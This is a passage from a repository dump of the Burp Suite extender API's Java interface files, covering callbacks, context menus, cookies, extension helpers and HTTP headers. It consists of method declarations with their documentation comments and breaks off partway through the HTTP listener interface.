884 | * HTML and XML. 885 | * @param issues The Scanner issues to be reported. 886 | * @param file The file to which the report will be saved. 887 | */ 888 | void generateScanReport( 889 | String format, IScanIssue[] issues, 890 | java.io.File file); 891 | 892 | /** 893 | * This method is used to retrieve the contents of Burp's session handling 894 | * cookie jar. Extensions that provide an 895 | * ISessionHandlingAction can query and update the cookie jar 896 | * in order to handle unusual session handling mechanisms. 897 | * 898 | * @return A list of ICookie objects representing the contents 899 | * of Burp's session handling cookie jar. 900 | */ 901 | List getCookieJarContents(); 902 | 903 | /** 904 | * This method is used to update the contents of Burp's session handling 905 | * cookie jar. Extensions that provide an 906 | * ISessionHandlingAction can query and update the cookie jar 907 | * in order to handle unusual session handling mechanisms. 908 | * 909 | * @param cookie An ICookie object containing details of the 910 | * cookie to be updated. If the cookie jar already contains a cookie that 911 | * matches the specified domain and name, then that cookie will be updated 912 | * with the new value and expiration, unless the new value is 913 | * null, in which case the cookie will be removed. If the 914 | * cookie jar does not already contain a cookie that matches the specified 915 | * domain and name, then the cookie will be added. 916 | */ 917 | void updateCookieJar(ICookie cookie); 918 | 919 | /** 920 | * This method can be used to add an item to Burp's site map with the 921 | * specified request/response details. This will overwrite the details of 922 | * any existing matching item in the site map. 923 | * 924 | * @param item Details of the item to be added to the site map 925 | */ 926 | void addToSiteMap(IHttpRequestResponse item); 927 | 928 | /** 929 | * This method can be used to restore Burp's state from a specified saved 930 | * state file. This method blocks until the restore operation is completed, 931 | * and must not be called from the event dispatch thread. 932 | * 933 | * @param file The file containing Burp's saved state. 934 | * @deprecated State files have been replaced with Burp project files. 935 | */ 936 | @Deprecated 937 | void restoreState(java.io.File file); 938 | 939 | /** 940 | * This method can be used to save Burp's state to a specified file. This 941 | * method blocks until the save operation is completed, and must not be 942 | * called from the event dispatch thread. 943 | * 944 | * @param file The file to save Burp's state in. 945 | * @deprecated State files have been replaced with Burp project files. 946 | */ 947 | @Deprecated 948 | void saveState(java.io.File file); 949 | 950 | /** 951 | * This method is no longer supported. Please use saveConfigAsJson() instead. 952 | * 953 | * @return A Map of name/value Strings reflecting Burp's current 954 | * configuration. 955 | * @deprecated Use saveConfigAsJson() instead. 956 | */ 957 | @Deprecated 958 | Map saveConfig(); 959 | 960 | /** 961 | * This method is no longer supported. Please use loadConfigFromJson() instead. 962 | * 963 | * @param config A map of name/value Strings to use as Burp's new 964 | * configuration. 965 | * @deprecated Use loadConfigFromJson() instead. 966 | */ 967 | @Deprecated 968 | void loadConfig(Map config); 969 | 970 | /** 971 | * This method causes Burp to save its current project-level configuration 972 | * in JSON format. This is the same format that can be saved and loaded via 973 | * the Burp user interface. To include only certain sections of the 974 | * configuration, you can optionally supply the path to each section that 975 | * should be included, for example: "project_options.connections". If no 976 | * paths are provided, then the entire configuration will be saved. 977 | * 978 | * @param configPaths A list of Strings representing the path to each 979 | * configuration section that should be included. 980 | * @return A String representing the current configuration in JSON format. 981 | */ 982 | String saveConfigAsJson(String... configPaths); 983 | 984 | /** 985 | * This method causes Burp to load a new project-level configuration from 986 | * the JSON String provided. This is the same format that can be saved and 987 | * loaded via the Burp user interface. Partial configurations are 988 | * acceptable, and any settings not specified will be left unmodified. 989 | * 990 | * Any user-level configuration options contained in the input will be 991 | * ignored. 992 | * 993 | * @param config A JSON String containing the new configuration. 994 | */ 995 | void loadConfigFromJson(String config); 996 | 997 | /** 998 | * This method sets the master interception mode for Burp Proxy. 999 | * 1000 | * @param enabled Indicates whether interception of Proxy messages should be 1001 | * enabled. 1002 | */ 1003 | void setProxyInterceptionEnabled(boolean enabled); 1004 | 1005 | /** 1006 | * This method retrieves information about the version of Burp in which the 1007 | * extension is running. It can be used by extensions to dynamically adjust 1008 | * their behavior depending on the functionality and APIs supported by the 1009 | * current version. 1010 | * 1011 | * @return An array of Strings comprised of: the product name (e.g. Burp 1012 | * Suite Professional), the major version (e.g. 1.5), the minor version 1013 | * (e.g. 03) 1014 | */ 1015 | String[] getBurpVersion(); 1016 | 1017 | /** 1018 | * This method retrieves the absolute path name of the file from which the 1019 | * current extension was loaded. 1020 | * 1021 | * @return The absolute path name of the file from which the current 1022 | * extension was loaded. 1023 | */ 1024 | String getExtensionFilename(); 1025 | 1026 | /** 1027 | * This method determines whether the current extension was loaded as a BApp 1028 | * (a Burp App from the BApp Store). 1029 | * 1030 | * @return Returns true if the current extension was loaded as a BApp. 1031 | */ 1032 | boolean isExtensionBapp(); 1033 | 1034 | /** 1035 | * This method can be used to shut down Burp programmatically, with an 1036 | * optional prompt to the user. If the method returns, the user canceled the 1037 | * shutdown prompt. 1038 | * 1039 | * @param promptUser Indicates whether to prompt the user to confirm the 1040 | * shutdown. 1041 | */ 1042 | void exitSuite(boolean promptUser); 1043 | 1044 | /** 1045 | * This method is used to create a temporary file on disk containing the 1046 | * provided data. Extensions can use temporary files for long-term storage 1047 | * of runtime data, avoiding the need to retain that data in memory. 1048 | * 1049 | * @param buffer The data to be saved to a temporary file. 1050 | * @return An object that implements the ITempFile interface. 1051 | */ 1052 | ITempFile saveToTempFile(byte[] buffer); 1053 | 1054 | /** 1055 | * This method is used to save the request and response of an 1056 | * IHttpRequestResponse object to temporary files, so that they 1057 | * are no longer held in memory. Extensions can used this method to convert 1058 | * IHttpRequestResponse objects into a form suitable for 1059 | * long-term storage. 1060 | * 1061 | * @param httpRequestResponse The IHttpRequestResponse object 1062 | * whose request and response messages are to be saved to temporary files. 1063 | * @return An object that implements the 1064 | * IHttpRequestResponsePersisted interface. 1065 | */ 1066 | IHttpRequestResponsePersisted saveBuffersToTempFiles( 1067 | IHttpRequestResponse httpRequestResponse); 1068 | 1069 | /** 1070 | * This method is used to apply markers to an HTTP request or response, at 1071 | * offsets into the message that are relevant for some particular purpose. 1072 | * Markers are used in various situations, such as specifying Intruder 1073 | * payload positions, Scanner insertion points, and highlights in Scanner 1074 | * issues. 1075 | * 1076 | * @param httpRequestResponse The IHttpRequestResponse object 1077 | * to which the markers should be applied. 1078 | * @param requestMarkers A list of index pairs representing the offsets of 1079 | * markers to be applied to the request message. Each item in the list must 1080 | * be an int[2] array containing the start and end offsets for the marker. 1081 | * The markers in the list should be in sequence and not overlapping. This 1082 | * parameter is optional and may be null if no request markers 1083 | * are required. 1084 | * @param responseMarkers A list of index pairs representing the offsets of 1085 | * markers to be applied to the response message. Each item in the list must 1086 | * be an int[2] array containing the start and end offsets for the marker. 1087 | * The markers in the list should be in sequence and not overlapping. This 1088 | * parameter is optional and may be null if no response markers 1089 | * are required. 1090 | * @return An object that implements the 1091 | * IHttpRequestResponseWithMarkers interface. 1092 | */ 1093 | IHttpRequestResponseWithMarkers applyMarkers( 1094 | IHttpRequestResponse httpRequestResponse, 1095 | List requestMarkers, 1096 | List responseMarkers); 1097 | 1098 | /** 1099 | * This method is used to obtain the descriptive name for the Burp tool 1100 | * identified by the tool flag provided. 1101 | * 1102 | * @param toolFlag A flag identifying a Burp tool ( TOOL_PROXY, 1103 | * TOOL_SCANNER, etc.). Tool flags are defined within this 1104 | * interface. 1105 | * @return The descriptive name for the specified tool. 1106 | */ 1107 | String getToolName(int toolFlag); 1108 | 1109 | /** 1110 | * This method is used to register a new Scanner issue. Note: 1111 | * Wherever possible, extensions should implement custom Scanner checks 1112 | * using IScannerCheck and report issues via those checks, so 1113 | * as to integrate with Burp's user-driven workflow, and ensure proper 1114 | * consolidation of duplicate reported issues. This method is only designed 1115 | * for tasks outside of the normal testing workflow, such as importing 1116 | * results from other scanning tools. 1117 | * 1118 | * @param issue An object created by the extension that implements the 1119 | * IScanIssue interface. 1120 | */ 1121 | void addScanIssue(IScanIssue issue); 1122 | 1123 | /** 1124 | * This method is used to create a new Burp Collaborator client context, 1125 | * which can be used to generate Burp Collaborator payloads and poll the 1126 | * Collaborator server for any network interactions that result from using 1127 | * those payloads. 1128 | * 1129 | * @return A new instance of IBurpCollaboratorClientContext 1130 | * that can be used to generate Collaborator payloads and retrieve 1131 | * interactions. 1132 | */ 1133 | IBurpCollaboratorClientContext createBurpCollaboratorClientContext(); 1134 | 1135 | /** 1136 | * This method parses the specified request and returns details of each 1137 | * request parameter. 1138 | * 1139 | * @param request The request to be parsed. 1140 | * @return An array of: String[] { name, value, type } 1141 | * containing details of the parameters contained within the request. 1142 | * @deprecated Use IExtensionHelpers.analyzeRequest() instead. 1143 | */ 1144 | @Deprecated 1145 | String[][] getParameters(byte[] request); 1146 | 1147 | /** 1148 | * This method parses the specified request and returns details of each HTTP 1149 | * header. 1150 | * 1151 | * @param message The request to be parsed. 1152 | * @return An array of HTTP headers. 1153 | * @deprecated Use IExtensionHelpers.analyzeRequest() or 1154 | * IExtensionHelpers.analyzeResponse() instead. 1155 | */ 1156 | @Deprecated 1157 | String[] getHeaders(byte[] message); 1158 | 1159 | /** 1160 | * This method can be used to register a new menu item which will appear on 1161 | * the various context menus that are used throughout Burp Suite to handle 1162 | * user-driven actions. 1163 | * 1164 | * @param menuItemCaption The caption to be displayed on the menu item. 1165 | * @param menuItemHandler The handler to be invoked when the user clicks on 1166 | * the menu item. 1167 | * @deprecated Use registerContextMenuFactory() instead. 1168 | */ 1169 | @Deprecated 1170 | void registerMenuItem( 1171 | String menuItemCaption, 1172 | IMenuItemHandler menuItemHandler); 1173 | } 1174 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IContextMenuFactory.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IContextMenuFactory.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | 13 | import javax.swing.JMenuItem; 14 | import java.util.List; 15 | 16 | /** 17 | * Extensions can implement this interface and then call 18 | * IBurpExtenderCallbacks.registerContextMenuFactory() to register 19 | * a factory for custom context menu items. 20 | */ 21 | public interface IContextMenuFactory 22 | { 23 | /** 24 | * This method will be called by Burp when the user invokes a context menu 25 | * anywhere within Burp. The factory can then provide any custom context 26 | * menu items that should be displayed in the context menu, based on the 27 | * details of the menu invocation. 28 | * 29 | * @param invocation An object that implements the 30 | * IContextMenuInvocation interface, which the extension can 31 | * query to obtain details of the context menu invocation. 32 | * @return A list of custom menu items (which may include sub-menus, 33 | * checkbox menu items, etc.) that should be displayed. Extensions may 34 | * return 35 | * null from this method, to indicate that no menu items are 36 | * required. 37 | */ 38 | List createMenuItems(IContextMenuInvocation invocation); 39 | } 40 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IContextMenuInvocation.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IContextMenuInvocation.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.awt.event.InputEvent; 13 | 14 | /** 15 | * This interface is used when Burp calls into an extension-provided 16 | * IContextMenuFactory with details of a context menu invocation. 17 | * The custom context menu factory can query this interface to obtain details of 18 | * the invocation event, in order to determine what menu items should be 19 | * displayed. 20 | */ 21 | public interface IContextMenuInvocation 22 | { 23 | /** 24 | * Used to indicate that the context menu is being invoked in a request 25 | * editor. 26 | */ 27 | byte CONTEXT_MESSAGE_EDITOR_REQUEST = 0; 28 | /** 29 | * Used to indicate that the context menu is being invoked in a response 30 | * editor. 31 | */ 32 | byte CONTEXT_MESSAGE_EDITOR_RESPONSE = 1; 33 | /** 34 | * Used to indicate that the context menu is being invoked in a non-editable 35 | * request viewer. 36 | */ 37 | byte CONTEXT_MESSAGE_VIEWER_REQUEST = 2; 38 | /** 39 | * Used to indicate that the context menu is being invoked in a non-editable 40 | * response viewer. 41 | */ 42 | byte CONTEXT_MESSAGE_VIEWER_RESPONSE = 3; 43 | /** 44 | * Used to indicate that the context menu is being invoked in the Target 45 | * site map tree. 46 | */ 47 | byte CONTEXT_TARGET_SITE_MAP_TREE = 4; 48 | /** 49 | * Used to indicate that the context menu is being invoked in the Target 50 | * site map table. 51 | */ 52 | byte CONTEXT_TARGET_SITE_MAP_TABLE = 5; 53 | /** 54 | * Used to indicate that the context menu is being invoked in the Proxy 55 | * history. 56 | */ 57 | byte CONTEXT_PROXY_HISTORY = 6; 58 | /** 59 | * Used to indicate that the context menu is being invoked in the Scanner 60 | * results. 61 | */ 62 | byte CONTEXT_SCANNER_RESULTS = 7; 63 | /** 64 | * Used to indicate that the context menu is being invoked in the Intruder 65 | * payload positions editor. 66 | */ 67 | byte CONTEXT_INTRUDER_PAYLOAD_POSITIONS = 8; 68 | /** 69 | * Used to indicate that the context menu is being invoked in an Intruder 70 | * attack results. 71 | */ 72 | byte CONTEXT_INTRUDER_ATTACK_RESULTS = 9; 73 | /** 74 | * Used to indicate that the context menu is being invoked in a search 75 | * results window. 76 | */ 77 | byte CONTEXT_SEARCH_RESULTS = 10; 78 | 79 | /** 80 | * This method can be used to retrieve the native Java input event that was 81 | * the trigger for the context menu invocation. 82 | * 83 | * @return The InputEvent that was the trigger for the context 84 | * menu invocation. 85 | */ 86 | InputEvent getInputEvent(); 87 | 88 | /** 89 | * This method can be used to retrieve the Burp tool within which the 90 | * context menu was invoked. 91 | * 92 | * @return A flag indicating the Burp tool within which the context menu was 93 | * invoked. Burp tool flags are defined in the 94 | * IBurpExtenderCallbacks interface. 95 | */ 96 | int getToolFlag(); 97 | 98 | /** 99 | * This method can be used to retrieve the context within which the menu was 100 | * invoked. 101 | * 102 | * @return An index indicating the context within which the menu was 103 | * invoked. The indices used are defined within this interface. 104 | */ 105 | byte getInvocationContext(); 106 | 107 | /** 108 | * This method can be used to retrieve the bounds of the user's selection 109 | * into the current message, if applicable. 110 | * 111 | * @return An int[2] array containing the start and end offsets of the 112 | * user's selection in the current message. If the user has not made any 113 | * selection in the current message, both offsets indicate the position of 114 | * the caret within the editor. If the menu is not being invoked from a 115 | * message editor, the method returns null. 116 | */ 117 | int[] getSelectionBounds(); 118 | 119 | /** 120 | * This method can be used to retrieve details of the HTTP requests / 121 | * responses that were shown or selected by the user when the context menu 122 | * was invoked. 123 | * 124 | * Note: For performance reasons, the objects returned from this 125 | * method are tied to the originating context of the messages within the 126 | * Burp UI. For example, if a context menu is invoked on the Proxy intercept 127 | * panel, then the 128 | * IHttpRequestResponse returned by this method will reflect 129 | * the current contents of the interception panel, and this will change when 130 | * the current message has been forwarded or dropped. If your extension 131 | * needs to store details of the message for which the context menu has been 132 | * invoked, then you should query those details from the 133 | * IHttpRequestResponse at the time of invocation, or you 134 | * should use 135 | * IBurpExtenderCallbacks.saveBuffersToTempFiles() to create a 136 | * persistent read-only copy of the 137 | * IHttpRequestResponse. 138 | * 139 | * @return An array of IHttpRequestResponse objects 140 | * representing the items that were shown or selected by the user when the 141 | * context menu was invoked. This method returns null if no 142 | * messages are applicable to the invocation. 143 | */ 144 | IHttpRequestResponse[] getSelectedMessages(); 145 | 146 | /** 147 | * This method can be used to retrieve details of the Scanner issues that 148 | * were selected by the user when the context menu was invoked. 149 | * 150 | * @return An array of IScanIssue objects representing the 151 | * issues that were selected by the user when the context menu was invoked. 152 | * This method returns null if no Scanner issues are applicable 153 | * to the invocation. 154 | */ 155 | IScanIssue[] getSelectedIssues(); 156 | } 157 | -------------------------------------------------------------------------------- /burpdemo/src/burp/ICookie.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)ICookie.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.util.Date; 13 | 14 | /** 15 | * This interface is used to hold details about an HTTP cookie. 16 | */ 17 | public interface ICookie 18 | { 19 | /** 20 | * This method is used to retrieve the domain for which the cookie is in 21 | * scope. 22 | * 23 | * @return The domain for which the cookie is in scope. Note: For 24 | * cookies that have been analyzed from responses (by calling 25 | * IExtensionHelpers.analyzeResponse() and then 26 | * IResponseInfo.getCookies(), the domain will be 27 | * null if the response did not explicitly set a domain 28 | * attribute for the cookie. 29 | */ 30 | String getDomain(); 31 | 32 | /** 33 | * This method is used to retrieve the path for which the cookie is in 34 | * scope. 35 | * 36 | * @return The path for which the cookie is in scope or null if none is set. 37 | */ 38 | String getPath(); 39 | 40 | /** 41 | * This method is used to retrieve the expiration time for the cookie. 42 | * 43 | * @return The expiration time for the cookie, or 44 | * null if none is set (i.e., for non-persistent session 45 | * cookies). 46 | */ 47 | Date getExpiration(); 48 | 49 | /** 50 | * This method is used to retrieve the name of the cookie. 51 | * 52 | * @return The name of the cookie. 53 | */ 54 | String getName(); 55 | 56 | /** 57 | * This method is used to retrieve the value of the cookie. 58 | * @return The value of the cookie. 59 | */ 60 | String getValue(); 61 | } 62 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IExtensionHelpers.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IExtensionHelpers.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.net.URL; 13 | import java.util.List; 14 | 15 | /** 16 | * This interface contains a number of helper methods, which extensions can use 17 | * to assist with various common tasks that arise for Burp extensions. 18 | * 19 | * Extensions can call IBurpExtenderCallbacks.getHelpers to obtain 20 | * an instance of this interface. 21 | */ 22 | public interface IExtensionHelpers 23 | { 24 | 25 | /** 26 | * This method can be used to analyze an HTTP request, and obtain various 27 | * key details about it. 28 | * 29 | * @param request An IHttpRequestResponse object containing the 30 | * request to be analyzed. 31 | * @return An IRequestInfo object that can be queried to obtain 32 | * details about the request. 33 | */ 34 | IRequestInfo analyzeRequest(IHttpRequestResponse request); 35 | 36 | /** 37 | * This method can be used to analyze an HTTP request, and obtain various 38 | * key details about it. 39 | * 40 | * @param httpService The HTTP service associated with the request. This is 41 | * optional and may be null, in which case the resulting 42 | * IRequestInfo object will not include the full request URL. 43 | * @param request The request to be analyzed. 44 | * @return An IRequestInfo object that can be queried to obtain 45 | * details about the request. 46 | */ 47 | IRequestInfo analyzeRequest(IHttpService httpService, byte[] request); 48 | 49 | /** 50 | * This method can be used to analyze an HTTP request, and obtain various 51 | * key details about it. The resulting IRequestInfo object will 52 | * not include the full request URL. To obtain the full URL, use one of the 53 | * other overloaded analyzeRequest() methods. 54 | * 55 | * @param request The request to be analyzed. 56 | * @return An IRequestInfo object that can be queried to obtain 57 | * details about the request. 58 | */ 59 | IRequestInfo analyzeRequest(byte[] request); 60 | 61 | /** 62 | * This method can be used to analyze an HTTP response, and obtain various 63 | * key details about it. 64 | * 65 | * @param response The response to be analyzed. 66 | * @return An IResponseInfo object that can be queried to 67 | * obtain details about the response. 68 | */ 69 | IResponseInfo analyzeResponse(byte[] response); 70 | 71 | /** 72 | * This method can be used to retrieve details of a specified parameter 73 | * within an HTTP request. Note: Use analyzeRequest() to 74 | * obtain details of all parameters within the request. 75 | * 76 | * @param request The request to be inspected for the specified parameter. 77 | * @param parameterName The name of the parameter to retrieve. 78 | * @return An IParameter object that can be queried to obtain 79 | * details about the parameter, or null if the parameter was 80 | * not found. 81 | */ 82 | IParameter getRequestParameter(byte[] request, String parameterName); 83 | 84 | /** 85 | * This method can be used to URL-decode the specified data. 86 | * 87 | * @param data The data to be decoded. 88 | * @return The decoded data. 89 | */ 90 | String urlDecode(String data); 91 | 92 | /** 93 | * This method can be used to URL-encode the specified data. Any characters 94 | * that do not need to be encoded within HTTP requests are not encoded. 95 | * 96 | * @param data The data to be encoded. 97 | * @return The encoded data. 98 | */ 99 | String urlEncode(String data); 100 | 101 | /** 102 | * This method can be used to URL-decode the specified data. 103 | * 104 | * @param data The data to be decoded. 105 | * @return The decoded data. 106 | */ 107 | byte[] urlDecode(byte[] data); 108 | 109 | /** 110 | * This method can be used to URL-encode the specified data. Any characters 111 | * that do not need to be encoded within HTTP requests are not encoded. 112 | * 113 | * @param data The data to be encoded. 114 | * @return The encoded data. 115 | */ 116 | byte[] urlEncode(byte[] data); 117 | 118 | /** 119 | * This method can be used to Base64-decode the specified data. 120 | * 121 | * @param data The data to be decoded. 122 | * @return The decoded data. 123 | */ 124 | byte[] base64Decode(String data); 125 | 126 | /** 127 | * This method can be used to Base64-decode the specified data. 128 | * 129 | * @param data The data to be decoded. 130 | * @return The decoded data. 131 | */ 132 | byte[] base64Decode(byte[] data); 133 | 134 | /** 135 | * This method can be used to Base64-encode the specified data. 136 | * 137 | * @param data The data to be encoded. 138 | * @return The encoded data. 139 | */ 140 | String base64Encode(String data); 141 | 142 | /** 143 | * This method can be used to Base64-encode the specified data. 144 | * 145 | * @param data The data to be encoded. 146 | * @return The encoded data. 147 | */ 148 | String base64Encode(byte[] data); 149 | 150 | /** 151 | * This method can be used to convert data from String form into an array of 152 | * bytes. The conversion does not reflect any particular character set, and 153 | * a character with the hex representation 0xWXYZ will always be converted 154 | * into a byte with the representation 0xYZ. It performs the opposite 155 | * conversion to the method bytesToString(), and byte-based 156 | * data that is converted to a String and back again using these two methods 157 | * is guaranteed to retain its integrity (which may not be the case with 158 | * conversions that reflect a given character set). 159 | * 160 | * @param data The data to be converted. 161 | * @return The converted data. 162 | */ 163 | byte[] stringToBytes(String data); 164 | 165 | /** 166 | * This method can be used to convert data from an array of bytes into 167 | * String form. The conversion does not reflect any particular character 168 | * set, and a byte with the representation 0xYZ will always be converted 169 | * into a character with the hex representation 0x00YZ. It performs the 170 | * opposite conversion to the method stringToBytes(), and 171 | * byte-based data that is converted to a String and back again using these 172 | * two methods is guaranteed to retain its integrity (which may not be the 173 | * case with conversions that reflect a given character set). 174 | * 175 | * @param data The data to be converted. 176 | * @return The converted data. 177 | */ 178 | String bytesToString(byte[] data); 179 | 180 | /** 181 | * This method searches a piece of data for the first occurrence of a 182 | * specified pattern. It works on byte-based data in a way that is similar 183 | * to the way the native Java method String.indexOf() works on 184 | * String-based data. 185 | * 186 | * @param data The data to be searched. 187 | * @param pattern The pattern to be searched for. 188 | * @param caseSensitive Flags whether or not the search is case-sensitive. 189 | * @param from The offset within data where the search should 190 | * begin. 191 | * @param to The offset within data where the search should 192 | * end. 193 | * @return The offset of the first occurrence of the pattern within the 194 | * specified bounds, or -1 if no match is found. 195 | */ 196 | int indexOf( 197 | byte[] data, 198 | byte[] pattern, 199 | boolean caseSensitive, 200 | int from, 201 | int to); 202 | 203 | /** 204 | * This method builds an HTTP message containing the specified headers and 205 | * message body. If applicable, the Content-Length header will be added or 206 | * updated, based on the length of the body. 207 | * 208 | * @param headers A list of headers to include in the message. 209 | * @param body The body of the message, of null if the message 210 | * has an empty body. 211 | * @return The resulting full HTTP message. 212 | */ 213 | byte[] buildHttpMessage(List headers, byte[] body); 214 | 215 | /** 216 | * This method creates a GET request to the specified URL. The headers used 217 | * in the request are determined by the Request headers settings as 218 | * configured in Burp Spider's options. 219 | * 220 | * @param url The URL to which the request should be made. 221 | * @return A request to the specified URL. 222 | */ 223 | byte[] buildHttpRequest(URL url); 224 | 225 | /** 226 | * This method adds a new parameter to an HTTP request, and if appropriate 227 | * updates the Content-Length header. 228 | * 229 | * @param request The request to which the parameter should be added. 230 | * @param parameter An IParameter object containing details of 231 | * the parameter to be added. Supported parameter types are: 232 | * PARAM_URL, PARAM_BODY and 233 | * PARAM_COOKIE. 234 | * @return A new HTTP request with the new parameter added. 235 | */ 236 | byte[] addParameter(byte[] request, IParameter parameter); 237 | 238 | /** 239 | * This method removes a parameter from an HTTP request, and if appropriate 240 | * updates the Content-Length header. 241 | * 242 | * @param request The request from which the parameter should be removed. 243 | * @param parameter An IParameter object containing details of 244 | * the parameter to be removed. Supported parameter types are: 245 | * PARAM_URL, PARAM_BODY and 246 | * PARAM_COOKIE. 247 | * @return A new HTTP request with the parameter removed. 248 | */ 249 | byte[] removeParameter(byte[] request, IParameter parameter); 250 | 251 | /** 252 | * This method updates the value of a parameter within an HTTP request, and 253 | * if appropriate updates the Content-Length header. Note: This 254 | * method can only be used to update the value of an existing parameter of a 255 | * specified type. If you need to change the type of an existing parameter, 256 | * you should first call removeParameter() to remove the 257 | * parameter with the old type, and then call addParameter() to 258 | * add a parameter with the new type. 259 | * 260 | * @param request The request containing the parameter to be updated. 261 | * @param parameter An IParameter object containing details of 262 | * the parameter to be updated. Supported parameter types are: 263 | * PARAM_URL, PARAM_BODY and 264 | * PARAM_COOKIE. 265 | * @return A new HTTP request with the parameter updated. 266 | */ 267 | byte[] updateParameter(byte[] request, IParameter parameter); 268 | 269 | /** 270 | * This method can be used to toggle a request's method between GET and 271 | * POST. Parameters are relocated between the URL query string and message 272 | * body as required, and the Content-Length header is created or removed as 273 | * applicable. 274 | * 275 | * @param request The HTTP request whose method should be toggled. 276 | * @return A new HTTP request using the toggled method. 277 | */ 278 | byte[] toggleRequestMethod(byte[] request); 279 | 280 | /** 281 | * This method constructs an IHttpService object based on the 282 | * details provided. 283 | * 284 | * @param host The HTTP service host. 285 | * @param port The HTTP service port. 286 | * @param protocol The HTTP service protocol. 287 | * @return An IHttpService object based on the details 288 | * provided. 289 | */ 290 | IHttpService buildHttpService(String host, int port, String protocol); 291 | 292 | /** 293 | * This method constructs an IHttpService object based on the 294 | * details provided. 295 | * 296 | * @param host The HTTP service host. 297 | * @param port The HTTP service port. 298 | * @param useHttps Flags whether the HTTP service protocol is HTTPS or HTTP. 299 | * @return An IHttpService object based on the details 300 | * provided. 301 | */ 302 | IHttpService buildHttpService(String host, int port, boolean useHttps); 303 | 304 | /** 305 | * This method constructs an IParameter object based on the 306 | * details provided. 307 | * 308 | * @param name The parameter name. 309 | * @param value The parameter value. 310 | * @param type The parameter type, as defined in the IParameter 311 | * interface. 312 | * @return An IParameter object based on the details provided. 313 | */ 314 | IParameter buildParameter(String name, String value, byte type); 315 | 316 | /** 317 | * This method constructs an IHttpHeader object based on the 318 | * details provided. 319 | * 320 | * @param name The header name. 321 | * @param value The header value. 322 | * @return An IHttpHeader object based on the details provided. 323 | */ 324 | IHttpHeader buildHeader(String name, String value); 325 | 326 | /** 327 | * This method constructs an IScannerInsertionPoint object 328 | * based on the details provided. It can be used to quickly create a simple 329 | * insertion point based on a fixed payload location within a base request. 330 | * 331 | * @param insertionPointName The name of the insertion point. 332 | * @param baseRequest The request from which to build scan requests. 333 | * @param from The offset of the start of the payload location. 334 | * @param to The offset of the end of the payload location. 335 | * @return An IScannerInsertionPoint object based on the 336 | * details provided. 337 | */ 338 | IScannerInsertionPoint makeScannerInsertionPoint( 339 | String insertionPointName, 340 | byte[] baseRequest, 341 | int from, 342 | int to); 343 | 344 | /** 345 | * This method analyzes one or more responses to identify variations in a 346 | * number of attributes and returns an IResponseVariations 347 | * object that can be queried to obtain details of the variations. 348 | * 349 | * @param responses The responses to analyze. 350 | * @return An IResponseVariations object representing the 351 | * variations in the responses. 352 | */ 353 | IResponseVariations analyzeResponseVariations(byte[]... responses); 354 | 355 | /** 356 | * This method analyzes one or more responses to identify the number of 357 | * occurrences of the specified keywords and returns an 358 | * IResponseKeywords object that can be queried to obtain 359 | * details of the number of occurrences of each keyword. 360 | * 361 | * @param keywords The keywords to look for. 362 | * @param responses The responses to analyze. 363 | * @return An IResponseKeywords object representing the counts 364 | * of the keywords appearing in the responses. 365 | */ 366 | IResponseKeywords analyzeResponseKeywords(List keywords, byte[]... responses); 367 | } 368 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IExtensionStateListener.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IExtensionStateListener.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * Extensions can implement this interface and then call 14 | * IBurpExtenderCallbacks.registerExtensionStateListener() to 15 | * register an extension state listener. The listener will be notified of 16 | * changes to the extension's state. Note: Any extensions that start 17 | * background threads or open system resources (such as files or database 18 | * connections) should register a listener and terminate threads / close 19 | * resources when the extension is unloaded. 20 | */ 21 | public interface IExtensionStateListener 22 | { 23 | /** 24 | * This method is called when the extension is unloaded. 25 | */ 26 | void extensionUnloaded(); 27 | } 28 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IHttpHeader.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | /* 3 | * @(#)IHttpHeader.java 4 | * 5 | * Copyright PortSwigger Ltd. All rights reserved. 6 | * 7 | * This code may be used to extend the functionality of Burp Suite Community Edition 8 | * and Burp Suite Professional, provided that this usage does not violate the 9 | * license terms for those products. 10 | */ 11 | /** 12 | * This interface is used to hold details about an HTTP/2 header. 13 | */ 14 | public interface IHttpHeader 15 | { 16 | /** 17 | * This method is used to retrieve the name of the header. 18 | * @return The name of the header. 19 | */ 20 | String getName(); 21 | 22 | /** 23 | * This method is used to retrieve the value of the header. 24 | * @return The value of the header. 25 | */ 26 | String getValue(); 27 | } 28 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IHttpListener.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IHttpListener.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * Extensions can implement this interface and then call 14 | * IBurpExtenderCallbacks.registerHttpListener() to register an 15 | * HTTP listener. The listener will be notified of requests and responses made 16 | * by any Burp tool. 